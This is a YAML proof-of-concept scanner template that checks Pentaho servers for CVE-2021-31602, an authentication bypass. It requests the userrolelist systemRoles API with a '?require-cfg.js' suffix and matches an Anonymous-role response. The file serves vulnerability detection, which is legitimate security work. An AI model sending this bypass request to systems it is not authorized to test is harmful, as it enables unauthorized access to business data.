name: poc-yaml-pentaho-cve-2021-31602-authentication-bypass
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /pentaho/api/userrolelist/systemRoles?require-cfg.js
            follow_redirects: false
        expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
    r1:
        request:
            cache: true
            method: GET
            path: /api/userrolelist/systemRoles?require-cfg.js
            follow_redirects: false
        expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
expression: r0() || r1()
detail:
    author: For3stCo1d (https://github.com/For3stCo1d)
    description: "Pentaho-authentication-bypass"
    links:
        - https://packetstormsecurity.com/files/164784/Pentaho-Business-Analytics-Pentaho-Business-Server-9.1-Authentication-Bypass.html
        - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602